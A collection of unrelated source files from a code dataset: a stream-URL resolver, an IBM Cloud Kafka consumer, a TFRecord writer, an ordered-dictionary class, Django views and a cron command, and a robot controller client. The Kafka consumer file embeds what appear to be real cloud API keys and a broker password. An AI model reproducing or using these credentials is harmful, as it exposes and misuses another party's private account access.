providers[lastProvider] = [ lastURLs ]\r\n\r\n    # Flatten the 'providers' dict with a new key for each URL-list of the same provider.\r\n    # providers[videozoo] = [[...], [...], [...]] becomes providers[videozoo][...], providers[videozoo2][...], etc.\r\n    allProviders = {\r\n        (providerName if index == 1 else providerName + ' (' + str(index) + ')'): urlList\r\n        for providerName in providers.iterkeys()\r\n        for index, urlList in enumerate(providers[providerName], 1) \r\n    }\r\n    return allProviders if allProviders else None\r\n\r\n\r\ndef resolveProviderURL(providerURL):\r\n    '''\r\n    Tries to resolve a provider URL into a 
stream.\r\n '''\r\n try:\r\n temp = None\r\n requestHelper.delayBegin()\r\n r = requestHelper.GET(providerURL)\r\n if r.ok:\r\n html = r.text\r\n if 'var video_links' in html:\r\n # Try the generic videozoo \\ play44 resolve first:\r\n temp = re.findall(r'''var video_links.*?['\"]link['\"]\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n else:\r\n # Try variants (found sometimes in Playpanda.net etc.):\r\n temp = re.findall(r'''{\\s*?url\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n if not temp:\r\n temp = re.findall(r'''file\\s*?:\\s*?['\"](.*?)['\"]''', html, re.DOTALL)\r\n requestHelper.delayEnd(1000) # Sleep this thread a little before the next request, if necessary.\r\n if temp:\r\n return temp[0].replace(r'\\/', r'/') # Unescape any potential escaped JS slashes.\r\n except:\r\n pass\r\n\r\n return None","sub_path":"Lib/Providers.py","file_name":"Providers.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"323384126","text":"##Market_Index_Tracker.py - Michael Rist - Student ID 250996815\n#This service publishes the performance of key market indices for the previous day.\n#.\n\n#import libraries\nimport schedule\nimport time\nimport yfinance as yf\nimport datetime\nimport json\nimport ibm_boto3\nfrom ibm_botocore.client import Config, ClientError\nimport asyncio\nimport sys\nfrom confluent_kafka import Producer, Consumer, KafkaException\n#from event_streams_access import ProducerTask, EventStreamsDriver, ConsumerTask\n\n#Global Variables\n\n#for Object storage\nCOS_ENDPOINT = \"https://s3.us-east.cloud-object-storage.appdomain.cloud\"\nCOS_API_KEY_ID = \"O6M_tX17yK4Y-8o4RXI6ijQ5BRisJkSJvdUCcamgBt49\"\nCOS_AUTH_ENDPOINT = \"https://iam.cloud.ibm.com/identity/token\"\nCOS_RESOURCE_CRN = \"crn:v1:bluemix:public:cloud-object-storage:global:a/c5dc1427dfaa4a80894540effca9ecdb:58e73feb-1eff-4601-a9f7-4cceb8a81244::\"\ncos=ibm_boto3.resource(\"s3\",ibm_api_key_id=COS_API_KEY_ID,ibm_service_instance_id=COS_RESOURCE_CRN,ibm_auth_endpoint=COS_AUTH_ENDPOINT,config=Config(signature_version=\"oauth\"),endpoint_url=COS_ENDPOINT)\n\n\n#Main function opens a socket and, using helper function, sends data prior to closing the socket connection.\ndef main():\n #get current date\n #currDate=datetime.date.today()\n\n #initial call to push data to object storage (upon service startup)\n #pull_marketIndexTracker()\n\n #instantiate consumer eventstreamsdriver and run\n listen_eventMessage()\n\n\n#function retreives the market index data from object storage\ndef pull_marketIndexTracker():\n #markIndexJson=get_item(\"mc-objstore\", \"mark_inx_trkr.json\")\n try:\n markIndexJson = cos.Object(\"mc-objstore\", \"Curr_trkr.json\").get()\n print('Accessing Object Storage, retrieving: Curr_trkr.json')\n print()\n print(\"File Contents: {0}\".format(markIndexJson[\"Body\"].read()))\n\n return markIndexJson\n\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve file contents: {0}\".format(e))\n\n#get_buckets() function\n#retrieves a list of available buckets in object storage\ndef get_buckets():\n print(\"Retrieving list of buckets\")\n try:\n buckets = cos.buckets.all()\n for bucket in buckets:\n print(\"Bucket Name: {0}\".format(bucket.name))\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve list buckets: {0}\".format(e))\n\n#gets contents list of files in 
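# The resolver above tries several regex patterns in turn until one matches;
# a self-contained sketch of that fallback chain against an inline HTML
# sample (the markup and URL below are invented):
import re

SAMPLE_HTML = "<script>playerInstance.setup({ url : 'http://cdn.example/video.mp4' });</script>"

def extract_stream(html):
    for pattern in (
        r'''var video_links.*?['"]link['"]\s*?:\s*?['"](.*?)['"]''',
        r'''{\s*?url\s*?:\s*?['"](.*?)['"]''',
        r'''file\s*?:\s*?['"](.*?)['"]''',
    ):
        found = re.findall(pattern, html, re.DOTALL)
        if found:
            return found[0].replace(r'\/', '/')  # unescape JS-escaped slashes
    return None

print(extract_stream(SAMPLE_HTML))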
buckets\ndef get_bucket_contents(bucket_name):\n print(\"Retrieving bucket contents from: {0}\".format(bucket_name))\n try:\n files = cos.Bucket(bucket_name).objects.all()\n for file in files:\n print(\"Item: {0} ({1} bytes).\".format(file.key, file.size))\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve bucket contents: {0}\".format(e))\n\n#gets a specific item / file from object storage bucket\ndef get_item(bucket_name, item_name):\n print(\"Retrieving item from bucket: {0}, key: {1}\".format(bucket_name, item_name))\n try:\n file = cos.Object(bucket_name, item_name).get()\n print(\"File Contents: {0}\".format(file[\"Body\"].read()))\n return file\n except ClientError as be:\n print(\"CLIENT ERROR: {0}\\n\".format(be))\n except Exception as e:\n print(\"Unable to retrieve file contents: {0}\".format(e))\n\n#creates an instance of EventStreamsDriver for the consumer and\ndef listen_eventMessage():\n driver = EventStreamsDriver('Currency_Tracker','Currency_Tracker',False)\n driver.run_task()\n\n#code creates producertask\nclass ProducerTask(object):\n def __init__(self, conf, topic_name):\n self.topic_name = topic_name\n self.producer = Producer(conf)\n self.counter = 0\n self.running = True\n\n def stop(self):\n self.running = False\n\n def on_delivery(self, err, msg):\n if err:\n print('Delivery report: Failed sending message {0}'.format(msg.value()))\n print(err)\n # We could retry sending the message\n else:\n print('Message produced, offset: {0}'.format(msg.offset()))\n\n def run(self):\n self.producer.produce(self.topic_name, \"Hello! This is a message! 2\", callback=self.on_delivery)\n self.producer.poll(0)\n\n self.producer.flush()\n\n#code creates consumertask\nclass ConsumerTask(object):\n\n def __init__(self, conf, topic_name):\n self.consumer = Consumer(conf)\n self.topic_name = topic_name\n self.running = True\n self._observers = []\n\n def stop(self):\n self.running = False\n\n def print_assignment(self, consumer, partition):\n print('Assignment - subscribing to topic: ', partition)\n\n def register_observer(self, observer):\n self._observers.append(observer)\n\n def notify_observers(self, *args, **kwargs):\n for observer in self._observers:\n observer.notify(self, *args, **kwargs)\n\n def run(self):\n self.consumer.subscribe([self.topic_name], on_assign=self.print_assignment)\n\n try:\n while True:\n msg = self.consumer.poll(1)\n if msg is None:\n continue\n if msg.error():\n raise KafkaException(msg.error())\n else:\n sys.stderr.write('%% %s [%d] at offset %d with key %s:\\n' %\n (msg.topic(), msg.partition(), msg.offset(),\n str(msg.key())))\n #print(msg.value())\n self.notify_observers(msg.topic())\n\n #could add something here that will tell the widget / UI to go to Object Storage\n except KeyboardInterrupt:\n sys.stderr.write(\"%% Aborted by user\\n\")\n finally:\n self.consumer.unsubscribe()\n self.consumer.close()\n\n#code creates an instance of eventstreamsdriver\nclass EventStreamsDriver(object):\n def __init__(self, topic_name, service_name, producer):\n self.consumer = None\n self.producer = None\n\n if producer:\n self.run_producer = True\n else:\n self.run_producer = False\n\n self.topic_name = topic_name\n self.base_config = {\n 'bootstrap.servers': 
'broker-1-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-5-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-4-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-2-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-3-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093,broker-0-9tl582p7src9jz2d.kafka.svc03.us-south.eventstreams.cloud.ibm.com:9093',\n 'security.protocol': 'SASL_SSL',\n 'sasl.mechanisms': 'PLAIN',\n 'sasl.username': 'token',\n 'sasl.password': 'nbHuMTLnLi-rmmhP22gUQSUuExarXsEpF8z49FSBLJRj',\n 'api.version.request': True,\n 'broker.version.fallback': '0.10.2.1',\n 'log.connection.close' : False\n }\n self.prod_config = {\n 'client.id': service_name + '-producer'\n }\n self.cons_config = {\n 'client.id': service_name + '-consumer',\n 'group.id': 'money-cloud-services'\n }\n\n for key in self.base_config:\n self.cons_config[key] = self.base_config[key]\n self.prod_config[key] = self.base_config[key]\n\n def run_task(self):\n # tasks = []\n if self.run_producer:\n self.producer = ProducerTask(self.prod_config, self.topic_name)\n self.producer.run()\n # tasks.append(asyncio.ensure_future(self.producer.run()))\n else:\n self.consumer = ConsumerTask(self.cons_config, self.topic_name)\n observer=Observer(self.consumer)\n self.consumer.run()\n\n#in conjunction with the code in consumertask and eventstreamsdriver, Observer allows 'notify' upon reciept of a message and triggers our action\nclass Observer(object):\n def __init__(self, ConsumerTask):\n ConsumerTask.register_observer(self)\n\n def notify(self, ConsumerTask, *args, **kwargs):\n #print('Got', args, kwargs, 'From', ConsumerTask)\n if(args[0]=='Currency_Tracker'):\n print(\"Message Recieved from: \", args[0])\n print()\n pull_marketIndexTracker()\n print()\n print(\"-------------------------------------------------------\")\n\n\n\nmain() #start program\n","sub_path":"consumer_currency.py","file_name":"consumer_currency.py","file_ext":"py","file_size_in_byte":8673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84872410","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n\ndef normalize_image(img):\n img_norm = img - np.min(img)\n img_norm = img_norm / np.max(img_norm) * 255\n img_norm = img_norm.astype(np.uint8)\n\n # img_norm = cv2.normalize(img, None, 255, 0, cv2.NORM_MINMAX)\n\n return img_norm\n\n\ndef write_tfrecord(image_path):\n tfr_writer = tf.python_io.TFRecordWriter('./denoise.tfrecords')\n\n for folder in os.listdir(image_path):\n mat_file = os.path.join(image_path, folder, 'GTnoIntep.mat')\n raw = sio.loadmat(mat_file)['GTnoIntep']\n\n mat_noise_file = os.path.join(image_path, folder, '%s_noise.mat' % folder)\n raw_noise = sio.loadmat(mat_noise_file)['add_noise']\n\n for index in range(raw.shape[2]):\n # data: (192, 240) complex128, data_noise: (192, 240) float64\n data = np.squeeze(raw[:, :, index])\n data_noise = np.squeeze(raw_noise[:, :, index])\n\n data_real = np.real(data).astype(np.float32).reshape((data.shape[0], data.shape[1], 1))\n data_imag = np.imag(data).astype(np.float32).reshape((data.shape[0], data.shape[1], 1))\n data = np.concatenate((data_real, data_imag), axis=2)\n\n # data = np.abs(data)\n data_noise = data_noise.astype(np.float32)\n data_noise = normalize_image(data_noise)\n\n example = tf.train.Example(\n 
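# A broker-free sketch of the observer wiring used by ConsumerTask above:
# the subject keeps a list of observers and calls notify() on each incoming
# message, keeping message handling decoupled from the Kafka polling loop.
class Subject:
    def __init__(self):
        self._observers = []

    def register_observer(self, observer):
        self._observers.append(observer)

    def notify_observers(self, *args, **kwargs):
        for observer in self._observers:
            observer.notify(self, *args, **kwargs)

class PrintingObserver:
    def __init__(self, subject):
        subject.register_observer(self)  # self-registration, as in the code above

    def notify(self, subject, topic):
        print("message received on topic:", topic)

subject = Subject()
PrintingObserver(subject)
subject.notify_observers("Currency_Tracker")  # simulated incoming message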
features=tf.train.Features(\n                    feature={\n                        'label': tf.train.Feature(float_list=tf.train.FloatList(value=data.flatten().tolist())),\n                        'image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[data_noise.tobytes()])),\n                        'value': tf.train.Feature(int64_list=tf.train.Int64List(value=[1]))\n                    }))\n\n            tfr_writer.write(example.SerializeToString())\n\n    tfr_writer.close()\n\n    # small test (optional)\n    for serialized_example in tf.python_io.tf_record_iterator('./denoise.tfrecords'):\n        example = tf.train.Example()\n        example.ParseFromString(serialized_example)\n\n        data = example.features.feature['label'].float_list.value\n        data_noise = example.features.feature['image'].bytes_list.value\n        value = example.features.feature['value'].int64_list.value\n\n        # print(data)\n        # print(data_noise)\n\n\ndef read_tfrecord():\n    # specify `num_epochs` times for generating an `OutOfRange` error\n    filename_q_input = tf.train.string_input_producer(['./denoise.tfrecords'], num_epochs=1, shuffle=False)\n\n    tfr_reader = tf.TFRecordReader()\n    k, v = tfr_reader.read(filename_q_input)\n\n    features = {\n        'label': tf.FixedLenFeature([192 * 240 * 2], tf.float32),\n        'image': tf.FixedLenFeature([], tf.string),\n        'value': tf.FixedLenFeature([], tf.int64)\n    }\n\n    parsed_features = tf.parse_single_example(v, features)\n\n    data = parsed_features['label']\n    data_noise = parsed_features['image']\n    data_noise = tf.decode_raw(data_noise, tf.uint8)\n    value = parsed_features['value']\n\n    return data, data_noise, value\n\n\nif __name__ == '__main__':\n    data_dir = 'D:/Temp/amax/jgl-0420/Thrive/data'\n    data_dir = 'D:/Dataset/MRI/data'\n\n    write_tfrecord(data_dir)\n    label, img, val = read_tfrecord()\n\n    init = tf.initialize_all_variables()\n\n    with tf.Session() as sess:\n        # string_input_producer defines an epoch variable, need initialization\n        sess.run(tf.local_variables_initializer())\n\n        sess.run(init)\n        threads = tf.train.start_queue_runners(sess=sess)\n        for i in range(10):\n            image_noise, image, value = sess.run([img, label, val])\n\n            image_noise.shape = 192, 240\n            image.shape = 192, 240, 2\n            image = image[:, :, 0] + 1j * image[:, :, 1]\n            image = np.abs(image)\n            print(value)\n\n            plt.subplot(121)\n            plt.imshow(image)\n            plt.subplot(122)\n            plt.imshow(image_noise)\n            plt.show()\n\n# https://blog.csdn.net/freedom098/article/details/56011858\n# https://blog.csdn.net/u012759136/article/details/52232266\n# https://blog.csdn.net/shenxiaolu1984/article/details/52857437\n# https://zhuanlan.zhihu.com/p/27238630\n# Project thrive_denoise\n","sub_path":"tensorflow/tfrecord.py","file_name":"tfrecord.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5086681","text":"# -*- coding: Latin-1 -*-\nclass DictionnaireOrdonne:\n\n\tdef __init__(self, base={},**donnees):\n\n\t\tself._cles=[]\n\t\tself._valeurs=[]\n\n\t\tif type(base) not in (dict, DictionnaireOrdonne):\n\t\t\traise TypeError(\"the expected type is a plain or an ordered dictionary\")\n\n\t\tfor cle in base:\n\t\t\tself[cle]=base[cle]\n\n\t\tfor cle in donnees:\n\t\t\tself[cle]=donnees[cle]\n\n\tdef __setitem__(self, cle, valeur):\n\n\t\tif cle in self._cles:\n\t\t\tindice= self._cles.index(cle)\n\t\t\tself._valeurs[indice]=valeur\n\t\telse:\n\t\t\tself._cles.append(cle)\n\t\t\tself._valeurs.append(valeur)\n\tdef __delitem__(self, cle):\n\n\t\tif cle in self._cles:\n\t\t\tindice= self._cles.index(cle)\n\t\t\tdel self._cles[indice]\n\t\t\tdel self._valeurs[indice]\n\t\telse:\n\t\t\traise KeyError(\"the 
dictionary does not contain this key\")\n\tdef __getitem__(self,cle):\n\t\tif cle not in self._cles:\n\t\t\traise KeyError(\"the dictionary does not contain the key {}\".format(cle))\n\t\telse:\n\t\t\tindice=self._cles.index(cle)\n\t\t\treturn self._valeurs[indice]\n\tdef __contains__(self,cle):\n\t\treturn cle in self._cles\n\n\tdef __len__(self):\n\t\treturn len(self._cles)\n\tdef __repr__(self):\n\n\t\tchaine=\"{\"\n\t\tpremier_passage=True\n\t\tfor cle,elt in self.items():\n\t\t\tif not premier_passage:\n\t\t\t\tchaine+=\", \"\n\t\t\telse:\n\t\t\t\tpremier_passage=False\n\t\t\tchaine+=repr(cle)+\": \"+repr(elt)\n\t\tchaine+=\"}\"\n\t\treturn chaine\n\tdef keys(self):\n\t\treturn list(self._cles)\n\n\tdef values(self):\n\t\treturn list(self._valeurs)\n\n\tdef items(self):\n\t\tfor i,elt in enumerate(self._cles):\n\t\t\tvaleur=self._valeurs[i]\n\t\t\tyield (elt,valeur)\n\n\tdef sort(self):\n\t\tcle_triees=sorted(self._cles)\n\t\tvaleurs=[]\n\n\t\tfor elt in cle_triees:\n\t\t\tvaleur=self[elt]\n\t\t\tvaleurs.append(valeur)\n\n\t\tself._cles=cle_triees\n\t\tself._valeurs=valeurs\n\tdef __iter__(self):\n\t\treturn iter(self._cles)\n\n\tdef reverse(self):\n\n\t\tcles=[]\n\t\tvaleurs=[]\n\n\t\tfor elt,valeur in self.items():\n\n\t\t\tcles.insert(0,elt)\n\t\t\tvaleurs.insert(0,valeur)\n\n\t\tself._cles=cles\n\t\tself._valeurs=valeurs\n\tdef __add__(self,d):\n\n\t\tif type(self) is not type(d):\n\t\t\traise TypeError(\"cannot add two objects of different types\")\n\n\t\telse:\n\t\t\tnouv=DictionnaireOrdonne()\n\t\t\tfor i,elt in self.items():\n\t\t\t\tnouv[i]=elt\n\t\t\tfor i,elt in d.items():\n\t\t\t\tnouv[i]=elt\n\t\t\treturn nouv\n\n\n\n\n\n\n","sub_path":"dictord.py","file_name":"dictord.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"529766907","text":"class Solution(object):\n    def calculateMinimumHP(self, dungeon):\n        \"\"\"\n        :type dungeon: List[List[int]]\n        :rtype: int\n        \"\"\"\n        m = len(dungeon)\n        n = len(dungeon[0])\n        dungeon[-1][-1] = 1 if dungeon[-1][-1] >= 0 else 1 - dungeon[-1][-1]\n\n        #HP must be greater than 0\n        for i in range(m-2, -1, -1):\n            dungeon[i][-1] = max(1,dungeon[i+1][-1] - dungeon[i][-1])\n        for j in range(n-2, -1, -1):\n            dungeon[-1][j] = max(1,dungeon[-1][j+1] - dungeon[-1][j])\n        for i in range(m-2, -1, -1):\n            for j in range(n-2, -1, -1):\n                a = max(1,dungeon[i+1][j] - dungeon[i][j])\n                b = max(1,dungeon[i][j+1] - dungeon[i][j])\n                dungeon[i][j] = min(a,b)\n        return dungeon[0][0]\n\ns = Solution()\ndungeon = [[-3,-12,4],[4,-2,0],[6,-7,-2]]\nprint(s.calculateMinimumHP(dungeon))\ndungeon = [[-2,-3,3],[-5,-10,1],[10,30,-5]]\nprint(s.calculateMinimumHP(dungeon))\n\n","sub_path":"174.
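# DictionnaireOrdonne above hand-rolls an insertion-ordered mapping; since
# Python 3.7 the built-in dict already preserves insertion order, and
# collections.OrderedDict offers the same idea with reordering helpers. A
# short sketch of the equivalent sort()/reverse() behaviour:
from collections import OrderedDict

d = OrderedDict([('pommes', 3), ('bananes', 1), ('cerises', 2)])
d_sorted = OrderedDict(sorted(d.items()))            # like DictionnaireOrdonne.sort()
d_reversed = OrderedDict(reversed(list(d.items())))  # like reverse()
print(list(d_sorted), list(d_reversed))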
Dungeon Game/174.py","file_name":"174.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"226398294","text":"#loggin\nimport logging\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n#filtering data\nfrom rest_framework import filters, generics\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom .models import Task\nfrom .serializers import TaskSerializer\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\n########## API VIEWS ###########\n\n#info primary screen\n@api_view(['GET'])\ndef apiUrlInfo(request):\n logger.info('API url Info Execution')\n api_urls = {\n\t\t'Tareas':'/api/list/',\n 'Crear':'/api/new/',\n\t\t'Detalles':'/api/detail//',\n\t\t'Actualizar':'/api/update//',\n\t\t'Eliminar':'/api/delete//',\n 'Filtrar': 'api/list/filter/?search='\n\t\t}\n return Response(api_urls)\n\n\n@api_view(['GET'])\ndef taskList(request):\n logger.info('Task List Execution')\n tasks = Task.objects.all().order_by('-date_posted')\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef taskDetail(request, pk):\n logger.info('Task Detail Execution')\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(task, many=False)\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef taskNew(request):\n logger.info('Task New Execution')\n serializer = TaskSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['POST'])\ndef taskUpdate(request, pk):\n logger.info('Task Update Execution')\n task = Task.objects.get(id=pk)\n serializer = TaskSerializer(instance=task, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef taskDelete(request, pk):\n logger.info('Task Delete Execution')\n task = Task.objects.get(id=pk)\n task.delete()\n\n return Response('Tarea eliminada')\n\n#filtering#\nclass taskListFilter(generics.ListAPIView):\n logger.info('Tasks Filters Execution')\n queryset = Task.objects.all().order_by('-date_posted')\n serializer_class = TaskSerializer\n filter_backends = [filters.SearchFilter]\n search_fields = ['title', 'date_posted']\n","sub_path":"todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491289489","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom ledger.accounts.models import EmailUser\nfrom commercialoperator.components.compliances.models import Compliance, ComplianceUserAction\nfrom commercialoperator.components.compliances.email import send_due_email_notification, send_internal_due_email_notification\nimport datetime\nimport itertools\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Change the status of Compliances from future to due when they are close to due date'\n\n def handle(self, *args, **options):\n today = timezone.localtime(timezone.now()).date()\n compare_date = today + datetime.timedelta(days=14)\n\n try:\n user = EmailUser.objects.get(email=settings.CRON_EMAIL)\n except:\n user = EmailUser.objects.create(email=settings.CRON_EMAIL, password='')\n\n logger.info('Running command {}'.format(__name__))\n 
for c in Compliance.objects.filter(processing_status = 'future'):\n #if(c.due_date<= compare_date<= c.approval.expiry_date) and c.approval.status=='current':\n if(c.due_date<= compare_date) and (c.due_date<= c.approval.expiry_date) and c.approval.status=='current':\n try:\n c.processing_status='due'\n c.customer_status='due'\n c.save()\n ComplianceUserAction.log_action(c,ComplianceUserAction.ACTION_STATUS_CHANGE.format(c.id),user)\n logger.info('updated Compliance {} status to {}'.format(c.id,c.processing_status))\n except:\n logger.info('Error updating Compliance {} status'.format(c.id))\n logger.info('Command {} completed'.format(__name__))\n","sub_path":"commercialoperator/management/commands/update_compliance_status.py","file_name":"update_compliance_status.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435491048","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2012-2015 MUJIN Inc\n\nimport copy\n\nfrom . import json\nfrom . import planningclient\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass RealtimeRobotControllerClient(planningclient.PlanningControllerClient):\n \"\"\"mujin controller client for realtimerobot task\n \"\"\"\n _robotname = None # optional name of the robot selected\n _robots = None # a dict of robot params\n _devices = None # a dict of device params\n _robotspeed = None # speed of the robot, e.g. 0.4\n _robotaccelmult = None # current robot accel mult\n _envclearance = None # environment clearance in milimeter, e.g. 20\n\n def __init__(self, robotname, robots, devices, robotspeed=None, robotaccelmult=None, envclearance=10.0, **kwargs):\n \"\"\"\n :param robotspeed: speed of the robot, e.g. 0.4\n :param envclearance: environment clearance in milimeter, e.g. 
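# A self-contained sketch of the due-window test applied by the management
# command above: a compliance becomes 'due' once its due date falls within
# 14 days of today and does not exceed the approval expiry. Dates below are
# made up for illustration.
import datetime

def should_become_due(due_date, expiry_date, today):
    compare_date = today + datetime.timedelta(days=14)
    return due_date <= compare_date and due_date <= expiry_date

print(should_become_due(datetime.date(2024, 1, 10),
                        datetime.date(2024, 6, 30),
                        today=datetime.date(2024, 1, 1)))  # True: due within the window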
20\n \"\"\"\n super(RealtimeRobotControllerClient, self).__init__(**kwargs)\n self._robotname = robotname\n self._robots = robots\n self._devices = devices\n self._robotspeed = robotspeed\n self._robotaccelmult = robotaccelmult\n self._envclearance = envclearance\n\n def GetRobotName(self):\n return self._robotname\n\n def SetRobotName(self, robotname):\n self._robotname = robotname\n\n def GetRobots(self):\n return self._robots\n\n def SetRobots(self, robots):\n self._robots = robots\n\n def SetRobotConfig(self, robotname, robotconfig):\n self._robots[robotname] = robotconfig\n\n def GetDevices(self):\n return self._devices\n\n def SetDevices(self, devices):\n self._devices = devices\n\n def GetRobotControllerUri(self):\n robots = self._robots or {}\n return robots.get(self._robotname, {}).get('robotControllerUri', '')\n\n def IsRobotControllerConfigured(self):\n return len(self.GetRobotControllerUri()) > 0\n\n def IsDeviceIOConfigured(self):\n devices = self.GetDevices() or []\n if len(devices) > 0:\n return any([len(deviceParams.get('params', {}).get('host', '')) > 0 for deviceParams in devices])\n\n return False\n\n def SetRobotSpeed(self, robotspeed):\n self._robotspeed = robotspeed\n\n def SetRobotAccelMult(self, robotaccelmult):\n self._robotaccelmult = robotaccelmult\n\n def ExecuteCommand(self, taskparameters, robotname=None, devices=None, toolname=None, robots=None, robotspeed=None, robotaccelmult=None, envclearance=None, usewebapi=None, timeout=10, fireandforget=False):\n \"\"\"wrapper to ExecuteCommand with robot info set up in taskparameters\n\n executes a command on the task.\n\n :return: a dictionary that contains:\n - robottype: robot type,string\n - currentjointvalues: current joint values, DOF floats\n - elapsedtime: elapsed time in seconds, float\n - numpoints: the number of points, int\n - error: optional error info, dictionary\n - desc: error message, string\n - type: error type, string\n - errorcode: error code, string\n \"\"\"\n if robotname is None:\n robotname = self._robotname\n if robots is None:\n robots = self._robots\n if devices is None:\n devices = self._devices\n\n # caller wants to use a different tool\n if toolname is not None:\n if robots is not None:\n robots = copy.deepcopy(robots)\n if robotname not in robots:\n robots[robotname] = {}\n robots[robotname]['toolname'] = toolname\n else:\n # set at the first level\n taskparameters['toolname'] = toolname\n\n if robots is not None:\n taskparameters['robots'] = robots\n if robots is None or robotname in robots:\n taskparameters['robotname'] = robotname\n if devices is not None:\n taskparameters['devices'] = devices\n\n # log.debug('robotname = %r, robots = %r, devices = %r', robotname, robots, devices)\n\n if 'robotspeed' not in taskparameters:\n if robotspeed is None:\n robotspeed = self._robotspeed\n if robotspeed is not None:\n taskparameters['robotspeed'] = robotspeed\n\n if 'robotaccelmult' not in taskparameters:\n if robotaccelmult is None:\n robotaccelmult = self._robotaccelmult\n if robotaccelmult is not None:\n taskparameters['robotaccelmult'] = robotaccelmult\n\n if 'envclearance' not in taskparameters or taskparameters['envclearance'] is None:\n if envclearance is None:\n envclearance = self._envclearance\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n\n return super(RealtimeRobotControllerClient, self).ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def ExecuteTrajectory(self, trajectoryxml, robotspeed=None, 
timeout=10, **kwargs):\n \"\"\"Executes a trajectory on the robot from a serialized Mujin Trajectory XML file.\n \"\"\"\n taskparameters = {'command': 'ExecuteTrajectory',\n 'trajectory': trajectoryxml,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, timeout=timeout)\n\n def GetJointValues(self, timeout=10, **kwargs):\n \"\"\"gets the current robot joint values\n :return: current joint values in a json dictionary with\n - currentjointvalues: [0,0,0,0,0,0]\n \"\"\"\n taskparameters = {'command': 'GetJointValues'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def MoveJointStraight(self, deltagoalvalue, jointName, timeout=10, robotspeed=None, **kwargs):\n \"\"\"moves a single joint by the given delta in a straight motion\n :param jointName: name of the joint to move\n :param deltagoalvalue: how much to move the joint by (delta)\n \"\"\"\n taskparameters = {'command': 'MoveJointStraight',\n 'deltagoalvalue': deltagoalvalue,\n 'jointName': jointName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, timeout=timeout)\n\n def MoveToolLinear(self, goaltype, goals, toolname=None, timeout=10, robotspeed=None, **kwargs):\n \"\"\"moves the tool linearly\n :param goaltype: type of the goal, e.g. translationdirection5d\n :param goals: flat list of goals, e.g. two 5d ik goals: [380,450,50,0,0,1, 380,450,50,0,0,-1]\n :param toolname: name of the manipulator, default is self.toolname\n\n :param maxdeviationangle: how much the tool tip can rotationally deviate from the linear path\n :param plannername:\n\n :param workspeed: [anglespeed, transspeed] in deg/s and mm/s\n :param workaccel: [angleaccel, transaccel] in deg/s^2 and mm/s^2\n :param worksteplength: discretization for planning MoveHandStraight, in seconds.\n :param workminimumcompletetime: set to trajduration - 0.016s. EMU_MUJIN example requires at least this much\n :param workminimumcompleteratio: in case the duration of the trajectory is not known, can specify in terms of [0,1]. 1 is complete everything\n :param numspeedcandidates: if speed/accel are not specified, the number of candidates to consider\n :param workignorefirstcollisionee: time, necessary in case initial is in collision, has to be multiples of step length?\n :param workignorelastcollisionee: time, necessary in case goal is in collision, has to be multiples of step length?\n :param workignorefirstcollision:\n\n \"\"\"\n taskparameters = {'command': 'MoveToolLinear',\n 'goaltype': goaltype,\n 'goals': goals,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, toolname=toolname, timeout=timeout)\n\n def MoveToHandPosition(self, goaltype, goals, toolname=None, envclearance=None, closegripper=0, robotspeed=None, robotaccelmult=None, timeout=10, **kwargs):\n \"\"\"Computes the inverse kinematics and moves the manipulator to any one of the goals 